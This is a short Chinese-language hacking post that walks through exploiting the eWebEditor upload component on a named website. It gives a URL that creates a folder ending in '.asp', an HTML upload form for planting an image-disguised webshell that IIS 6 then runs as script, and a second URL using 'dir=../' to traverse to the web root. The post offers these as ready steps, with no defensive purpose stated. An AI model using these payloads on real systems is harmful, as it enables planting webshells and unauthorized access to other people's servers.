先访问这个地址:
Editor/asp/upload.asp?action=save&type=image&style=popup&cusdir=weibao.asp
访问这个地址可以建立个weibao.ASP的文件夹……
再用这个html代码上传。
<form action=”http://www.91ri.org/Editor/asp/upload.asp?action=save&type=image&style=popup&cusdir=qing.asp” method=post name=myform enctype=”multipart/form-data”>
<input type=file name=uploadfile size=100><br><br>
<input type=submit value=upload>
</form>
本地提交了一个图片小马,返回空白页面,查看源码,得到小马路径。还是IIS解析
漏洞~
对6.X的也管用,对ASP。aspx。JSP。均管用。
第2个漏洞就是:可以直接http://www.91ri.org/ewebeditor/admin/upload.asp?id=16&d_viewmode=&dir=..构造跳转目录。可以跳转到网站根目录,如果目录级别高的话,dir=../../这样来跳转。